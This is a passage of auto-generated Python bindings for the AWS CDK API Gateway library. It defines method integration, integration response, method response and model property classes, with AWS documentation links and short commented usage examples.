def __init__(self, *, cache_key_parameters: typing.Optional[typing.List[str]]=None, cache_namespace: typing.Optional[str]=None, connection_id: typing.Optional[str]=None, connection_type: typing.Optional[str]=None, content_handling: typing.Optional[str]=None, credentials: typing.Optional[str]=None, integration_http_method: typing.Optional[str]=None, integration_responses: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnMethod.IntegrationResponseProperty"]]]]]=None, passthrough_behavior: typing.Optional[str]=None, request_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, request_templates: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, timeout_in_millis: typing.Optional[jsii.Number]=None, type: typing.Optional[str]=None, uri: typing.Optional[str]=None):
"""
:param cache_key_parameters: ``CfnMethod.IntegrationProperty.CacheKeyParameters``.
:param cache_namespace: ``CfnMethod.IntegrationProperty.CacheNamespace``.
:param connection_id: ``CfnMethod.IntegrationProperty.ConnectionId``.
:param connection_type: ``CfnMethod.IntegrationProperty.ConnectionType``.
:param content_handling: ``CfnMethod.IntegrationProperty.ContentHandling``.
:param credentials: ``CfnMethod.IntegrationProperty.Credentials``.
:param integration_http_method: ``CfnMethod.IntegrationProperty.IntegrationHttpMethod``.
:param integration_responses: ``CfnMethod.IntegrationProperty.IntegrationResponses``.
:param passthrough_behavior: ``CfnMethod.IntegrationProperty.PassthroughBehavior``.
:param request_parameters: ``CfnMethod.IntegrationProperty.RequestParameters``.
:param request_templates: ``CfnMethod.IntegrationProperty.RequestTemplates``.
:param timeout_in_millis: ``CfnMethod.IntegrationProperty.TimeoutInMillis``.
:param type: ``CfnMethod.IntegrationProperty.Type``.
:param uri: ``CfnMethod.IntegrationProperty.Uri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html
"""
self._values = {
}
if cache_key_parameters is not None: self._values["cache_key_parameters"] = cache_key_parameters
if cache_namespace is not None: self._values["cache_namespace"] = cache_namespace
if connection_id is not None: self._values["connection_id"] = connection_id
if connection_type is not None: self._values["connection_type"] = connection_type
if content_handling is not None: self._values["content_handling"] = content_handling
if credentials is not None: self._values["credentials"] = credentials
if integration_http_method is not None: self._values["integration_http_method"] = integration_http_method
if integration_responses is not None: self._values["integration_responses"] = integration_responses
if passthrough_behavior is not None: self._values["passthrough_behavior"] = passthrough_behavior
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_templates is not None: self._values["request_templates"] = request_templates
if timeout_in_millis is not None: self._values["timeout_in_millis"] = timeout_in_millis
if type is not None: self._values["type"] = type
if uri is not None: self._values["uri"] = uri
@property
def cache_key_parameters(self) -> typing.Optional[typing.List[str]]:
"""``CfnMethod.IntegrationProperty.CacheKeyParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-cachekeyparameters
"""
return self._values.get('cache_key_parameters')
@property
def cache_namespace(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.CacheNamespace``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-cachenamespace
"""
return self._values.get('cache_namespace')
@property
def connection_id(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.ConnectionId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-connectionid
"""
return self._values.get('connection_id')
@property
def connection_type(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.ConnectionType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-connectiontype
"""
return self._values.get('connection_type')
@property
def content_handling(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.ContentHandling``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-contenthandling
"""
return self._values.get('content_handling')
@property
def credentials(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.Credentials``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-credentials
"""
return self._values.get('credentials')
@property
def integration_http_method(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.IntegrationHttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-integrationhttpmethod
"""
return self._values.get('integration_http_method')
@property
def integration_responses(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnMethod.IntegrationResponseProperty"]]]]]:
"""``CfnMethod.IntegrationProperty.IntegrationResponses``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-integrationresponses
"""
return self._values.get('integration_responses')
@property
def passthrough_behavior(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.PassthroughBehavior``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-passthroughbehavior
"""
return self._values.get('passthrough_behavior')
@property
def request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.IntegrationProperty.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-requestparameters
"""
return self._values.get('request_parameters')
@property
def request_templates(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.IntegrationProperty.RequestTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-requesttemplates
"""
return self._values.get('request_templates')
@property
def timeout_in_millis(self) -> typing.Optional[jsii.Number]:
"""``CfnMethod.IntegrationProperty.TimeoutInMillis``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-timeoutinmillis
"""
return self._values.get('timeout_in_millis')
@property
def type(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-type
"""
return self._values.get('type')
@property
def uri(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationProperty.Uri``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration.html#cfn-apigateway-method-integration-uri
"""
return self._values.get('uri')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
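# A sketch of an HTTP integration property, assuming a placeholder backend URL.
# Note that ``integration_http_method`` is the verb used for the backend call,
# independent of the method's own ``http_method``.
#
#   CfnMethod.IntegrationProperty(
#       type="HTTP",
#       integration_http_method="POST",
#       uri="https://backend.example.com/orders",
#       passthrough_behavior="WHEN_NO_TEMPLATES",
#       request_templates={"application/json": '{"source": "api"}'})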
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnMethod.IntegrationResponseProperty", jsii_struct_bases=[], name_mapping={'status_code': 'statusCode', 'content_handling': 'contentHandling', 'response_parameters': 'responseParameters', 'response_templates': 'responseTemplates', 'selection_pattern': 'selectionPattern'})
class IntegrationResponseProperty():
def __init__(self, *, status_code: str, content_handling: typing.Optional[str]=None, response_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, response_templates: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, selection_pattern: typing.Optional[str]=None):
"""
:param status_code: ``CfnMethod.IntegrationResponseProperty.StatusCode``.
:param content_handling: ``CfnMethod.IntegrationResponseProperty.ContentHandling``.
:param response_parameters: ``CfnMethod.IntegrationResponseProperty.ResponseParameters``.
:param response_templates: ``CfnMethod.IntegrationResponseProperty.ResponseTemplates``.
:param selection_pattern: ``CfnMethod.IntegrationResponseProperty.SelectionPattern``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html
"""
self._values = {
'status_code': status_code,
}
if content_handling is not None: self._values["content_handling"] = content_handling
if response_parameters is not None: self._values["response_parameters"] = response_parameters
if response_templates is not None: self._values["response_templates"] = response_templates
if selection_pattern is not None: self._values["selection_pattern"] = selection_pattern
@property
def status_code(self) -> str:
"""``CfnMethod.IntegrationResponseProperty.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integration-integrationresponse-statuscode
"""
return self._values.get('status_code')
@property
def content_handling(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationResponseProperty.ContentHandling``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integrationresponse-contenthandling
"""
return self._values.get('content_handling')
@property
def response_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.IntegrationResponseProperty.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integration-integrationresponse-responseparameters
"""
return self._values.get('response_parameters')
@property
def response_templates(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.IntegrationResponseProperty.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integration-integrationresponse-responsetemplates
"""
return self._values.get('response_templates')
@property
def selection_pattern(self) -> typing.Optional[str]:
"""``CfnMethod.IntegrationResponseProperty.SelectionPattern``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-integration-integrationresponse.html#cfn-apigateway-method-integration-integrationresponse-selectionpattern
"""
return self._values.get('selection_pattern')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'IntegrationResponseProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
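# Illustrative sketch (hypothetical values): an integration response that maps
# backend payloads matching a selection pattern onto HTTP 400.
#
#   error_response = CfnMethod.IntegrationResponseProperty(
#       status_code="400",
#       selection_pattern=".*\\[BadRequest\\].*",
#       response_templates={"application/json": '{"message": "bad request"}'},
#   )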
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnMethod.MethodResponseProperty", jsii_struct_bases=[], name_mapping={'status_code': 'statusCode', 'response_models': 'responseModels', 'response_parameters': 'responseParameters'})
class MethodResponseProperty():
def __init__(self, *, status_code: str, response_models: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, response_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]=None):
"""
:param status_code: ``CfnMethod.MethodResponseProperty.StatusCode``.
:param response_models: ``CfnMethod.MethodResponseProperty.ResponseModels``.
:param response_parameters: ``CfnMethod.MethodResponseProperty.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-methodresponse.html
"""
self._values = {
'status_code': status_code,
}
if response_models is not None: self._values["response_models"] = response_models
if response_parameters is not None: self._values["response_parameters"] = response_parameters
@property
def status_code(self) -> str:
"""``CfnMethod.MethodResponseProperty.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-methodresponse.html#cfn-apigateway-method-methodresponse-statuscode
"""
return self._values.get('status_code')
@property
def response_models(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnMethod.MethodResponseProperty.ResponseModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-methodresponse.html#cfn-apigateway-method-methodresponse-responsemodels
"""
return self._values.get('response_models')
@property
def response_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]:
"""``CfnMethod.MethodResponseProperty.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apitgateway-method-methodresponse.html#cfn-apigateway-method-methodresponse-responseparameters
"""
return self._values.get('response_parameters')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodResponseProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
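# Illustrative sketch (hypothetical values): declaring the 200 method response
# with a CORS header. response_parameters maps a header name to a boolean that
# marks whether the header is required.
#
#   ok_response = CfnMethod.MethodResponseProperty(
#       status_code="200",
#       response_parameters={
#           "method.response.header.Access-Control-Allow-Origin": True,
#       },
#   )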
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnMethodProps", jsii_struct_bases=[], name_mapping={'http_method': 'httpMethod', 'resource_id': 'resourceId', 'rest_api_id': 'restApiId', 'api_key_required': 'apiKeyRequired', 'authorization_scopes': 'authorizationScopes', 'authorization_type': 'authorizationType', 'authorizer_id': 'authorizerId', 'integration': 'integration', 'method_responses': 'methodResponses', 'operation_name': 'operationName', 'request_models': 'requestModels', 'request_parameters': 'requestParameters', 'request_validator_id': 'requestValidatorId'})
class CfnMethodProps():
def __init__(self, *, http_method: str, resource_id: str, rest_api_id: str, api_key_required: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, authorization_scopes: typing.Optional[typing.List[str]]=None, authorization_type: typing.Optional[str]=None, authorizer_id: typing.Optional[str]=None, integration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnMethod.IntegrationProperty"]]]=None, method_responses: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnMethod.MethodResponseProperty"]]]]]=None, operation_name: typing.Optional[str]=None, request_models: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, request_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]=None, request_validator_id: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::Method``.
:param http_method: ``AWS::ApiGateway::Method.HttpMethod``.
:param resource_id: ``AWS::ApiGateway::Method.ResourceId``.
:param rest_api_id: ``AWS::ApiGateway::Method.RestApiId``.
:param api_key_required: ``AWS::ApiGateway::Method.ApiKeyRequired``.
:param authorization_scopes: ``AWS::ApiGateway::Method.AuthorizationScopes``.
:param authorization_type: ``AWS::ApiGateway::Method.AuthorizationType``.
:param authorizer_id: ``AWS::ApiGateway::Method.AuthorizerId``.
:param integration: ``AWS::ApiGateway::Method.Integration``.
:param method_responses: ``AWS::ApiGateway::Method.MethodResponses``.
:param operation_name: ``AWS::ApiGateway::Method.OperationName``.
:param request_models: ``AWS::ApiGateway::Method.RequestModels``.
:param request_parameters: ``AWS::ApiGateway::Method.RequestParameters``.
:param request_validator_id: ``AWS::ApiGateway::Method.RequestValidatorId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html
"""
self._values = {
'http_method': http_method,
'resource_id': resource_id,
'rest_api_id': rest_api_id,
}
if api_key_required is not None: self._values["api_key_required"] = api_key_required
if authorization_scopes is not None: self._values["authorization_scopes"] = authorization_scopes
if authorization_type is not None: self._values["authorization_type"] = authorization_type
if authorizer_id is not None: self._values["authorizer_id"] = authorizer_id
if integration is not None: self._values["integration"] = integration
if method_responses is not None: self._values["method_responses"] = method_responses
if operation_name is not None: self._values["operation_name"] = operation_name
if request_models is not None: self._values["request_models"] = request_models
if request_parameters is not None: self._values["request_parameters"] = request_parameters
if request_validator_id is not None: self._values["request_validator_id"] = request_validator_id
@property
def http_method(self) -> str:
"""``AWS::ApiGateway::Method.HttpMethod``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-httpmethod
"""
return self._values.get('http_method')
@property
def resource_id(self) -> str:
"""``AWS::ApiGateway::Method.ResourceId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-resourceid
"""
return self._values.get('resource_id')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Method.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-restapiid
"""
return self._values.get('rest_api_id')
@property
def api_key_required(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``AWS::ApiGateway::Method.ApiKeyRequired``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-apikeyrequired
"""
return self._values.get('api_key_required')
@property
def authorization_scopes(self) -> typing.Optional[typing.List[str]]:
"""``AWS::ApiGateway::Method.AuthorizationScopes``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizationscopes
"""
return self._values.get('authorization_scopes')
@property
def authorization_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.AuthorizationType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizationtype
"""
return self._values.get('authorization_type')
@property
def authorizer_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.AuthorizerId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-authorizerid
"""
return self._values.get('authorizer_id')
@property
def integration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnMethod.IntegrationProperty"]]]:
"""``AWS::ApiGateway::Method.Integration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-integration
"""
return self._values.get('integration')
@property
def method_responses(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnMethod.MethodResponseProperty"]]]]]:
"""``AWS::ApiGateway::Method.MethodResponses``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-methodresponses
"""
return self._values.get('method_responses')
@property
def operation_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.OperationName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-operationname
"""
return self._values.get('operation_name')
@property
def request_models(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::Method.RequestModels``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestmodels
"""
return self._values.get('request_models')
@property
def request_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,typing.Union[bool, aws_cdk.core.IResolvable]]]]]:
"""``AWS::ApiGateway::Method.RequestParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestparameters
"""
return self._values.get('request_parameters')
@property
def request_validator_id(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Method.RequestValidatorId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-method.html#cfn-apigateway-method-requestvalidatorid
"""
return self._values.get('request_validator_id')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnMethodProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
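# Illustrative sketch (hypothetical scope and ids): CfnMethodProps mirrors the
# keyword arguments accepted by the CfnMethod constructor, so a complete method
# can be wired onto an existing REST API like this. `stack`, `resource` and
# `api` are assumed to exist.
#
#   CfnMethod(stack, "GetMethod",
#       http_method="GET",
#       resource_id=resource.ref,
#       rest_api_id=api.ref,
#       authorization_type="NONE",
#       integration=CfnMethod.IntegrationProperty(type="MOCK"),
#       method_responses=[CfnMethod.MethodResponseProperty(status_code="200")],
#   )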
@jsii.implements(aws_cdk.core.IInspectable)
class CfnModel(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnModel"):
"""A CloudFormation ``AWS::ApiGateway::Model``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::Model
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, rest_api_id: str, content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, schema: typing.Any=None) -> None:
"""Create a new ``AWS::ApiGateway::Model``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param rest_api_id: ``AWS::ApiGateway::Model.RestApiId``.
:param content_type: ``AWS::ApiGateway::Model.ContentType``.
:param description: ``AWS::ApiGateway::Model.Description``.
:param name: ``AWS::ApiGateway::Model.Name``.
:param schema: ``AWS::ApiGateway::Model.Schema``.
"""
props = CfnModelProps(rest_api_id=rest_api_id, content_type=content_type, description=description, name=name, schema=schema)
jsii.create(CfnModel, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Model.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="schema")
def schema(self) -> typing.Any:
"""``AWS::ApiGateway::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-schema
"""
return jsii.get(self, "schema")
@schema.setter
def schema(self, value: typing.Any):
return jsii.set(self, "schema", value)
@property
@jsii.member(jsii_name="contentType")
def content_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.ContentType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-contenttype
"""
return jsii.get(self, "contentType")
@content_type.setter
def content_type(self, value: typing.Optional[str]):
return jsii.set(self, "contentType", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="name")
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-name
"""
return jsii.get(self, "name")
@name.setter
def name(self, value: typing.Optional[str]):
return jsii.set(self, "name", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnModelProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'content_type': 'contentType', 'description': 'description', 'name': 'name', 'schema': 'schema'})
class CfnModelProps():
def __init__(self, *, rest_api_id: str, content_type: typing.Optional[str]=None, description: typing.Optional[str]=None, name: typing.Optional[str]=None, schema: typing.Any=None):
"""Properties for defining a ``AWS::ApiGateway::Model``.
:param rest_api_id: ``AWS::ApiGateway::Model.RestApiId``.
:param content_type: ``AWS::ApiGateway::Model.ContentType``.
:param description: ``AWS::ApiGateway::Model.Description``.
:param name: ``AWS::ApiGateway::Model.Name``.
:param schema: ``AWS::ApiGateway::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html
"""
self._values = {
'rest_api_id': rest_api_id,
}
if content_type is not None: self._values["content_type"] = content_type
if description is not None: self._values["description"] = description
if name is not None: self._values["name"] = name
if schema is not None: self._values["schema"] = schema
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Model.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-restapiid
"""
return self._values.get('rest_api_id')
@property
def content_type(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.ContentType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-contenttype
"""
return self._values.get('content_type')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-description
"""
return self._values.get('description')
@property
def name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Model.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-name
"""
return self._values.get('name')
@property
def schema(self) -> typing.Any:
"""``AWS::ApiGateway::Model.Schema``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-model.html#cfn-apigateway-model-schema
"""
return self._values.get('schema')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnModelProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
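# Illustrative sketch (hypothetical values): the same model expressed as a
# reusable props struct. Omitted optional fields read back as None.
#
#   model_props = CfnModelProps(
#       rest_api_id=api.ref,
#       name="Pet",
#       schema={"type": "object"},
#   )
#   model_props.name         # -> "Pet"
#   model_props.description  # -> None (optional field that was omitted)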
@jsii.implements(aws_cdk.core.IInspectable)
class CfnModelV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnModelV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Model``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-model.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Model
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, name: str, schema: typing.Any, content_type: typing.Optional[str]=None, description: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Model``.
